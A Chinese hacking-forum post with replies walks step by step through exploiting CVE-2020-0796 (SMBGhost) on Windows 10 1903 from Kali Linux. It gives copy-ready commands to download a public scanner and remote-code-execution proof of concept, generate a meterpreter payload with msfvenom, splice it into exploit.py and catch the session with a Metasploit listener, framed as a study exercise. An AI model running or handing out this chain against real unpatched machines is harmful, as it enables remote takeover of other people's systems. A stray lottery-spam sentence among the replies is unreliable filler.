CVE-2020-0796(永恒之黑)
本帖最后由 MikeRita 于 2020-9-23 22:26 编辑最近看了一些文章发现CVE-2020-0796复现,然后看了一下大牛操作感觉挺简单的,就试一试能不能玩一下废话不多说我们开始吧~
攻击机:kali 2020
靶机windows10 1903 下载:
ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/
首先我们先下载两个文件
一个是漏洞检测,一个是木马poc
因为个人已经试过怎么安装了 这里就直接给大家打出代码 方便各位复制
漏洞检测
root@@kali:~/cve/2020-0796#wget https://github.com/ollypwn/SMBGhost/archive/master.zip #这是下载地址
root@@kali:~/cve/2020-0796#unzip master.zip #这是解压
root@@kali:~/cve/2020-0796#cd ./SMBGhost-master #切换目录
root@@kali:~/cve/2020-0796/SMBGhost-master #ls #查看目录下文件
README.md scanner.py SMBGhost.pcap #文件
root@@kali:~/cve/2020-0796/SMBGhost-master #python3 scanner.py IP地址 #检测是否存在有漏洞
POC
root@@kali:~/cve/2020-0796#wget https://github.com/chompie1337/SMBGhost_RCE_PoC/archive/master.zip #下载地址
root@@kali:~/cve/2020-0796#unzip master.zip.1 #解压
root@@kali:~/cve/2020-0796#cd./ SMBGhost_RCE_Poc-master/ #切换目录
root@@kali:~/cve/2020-0796/SMBGhost_RCE_Poc-master#ls #查看目录下文件
exploit .py kernel_shellcode.asm lznt1.py README.md smb_win.py #文件
生成木马
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python
接下来我们把生成木马和POC放在一起
vim exploit.py
替换后要输出这个代码
msf监听
这时候就要利用POC啦~最后一定要敲回车不如msf那边会一直不动
最后
总结:在做实验之前一定要关闭防火墙和扫描一下445端口是否打开。
不喜欢勿喷
感谢观看我是Mike,望多多指教!
本文章只供学习交流学习不可用于其他非法用途!!!
文章来源:kali中文网论坛:www.kaliorg.com
版权声明:凡注明“来源:kali中文网”的所有作品,均为kali中文网以作者的作品,未经作者及网站授权不得转载、摘编或利用其它方式使用上述作品。已经本网授权使用作品的,应在授权范围内使用,并注明“来源:kali中文网(www.kaliorg.com)”。违反上述声明者,本站将追究其相关法律责任。
一定要用python3来运行 不然会出错 学习了 adg325401 发表于 2020-9-29 13:27
学习了
加油 :lol加油,奥利给 试试 roy_shi 发表于 2020-10-30 12:40
加油,奥利给
好哟~ root2020 发表于 2020-11-3 17:13
试试
学到就是赚到 许多行业未来学家认为未来将有更明确的幸运飞艇直播,福彩双色球结果,幸运时时彩走势图定价和披露政策,以及基于定期聘用而非费用和佣金的顾问薪酬模式。
页:
[1]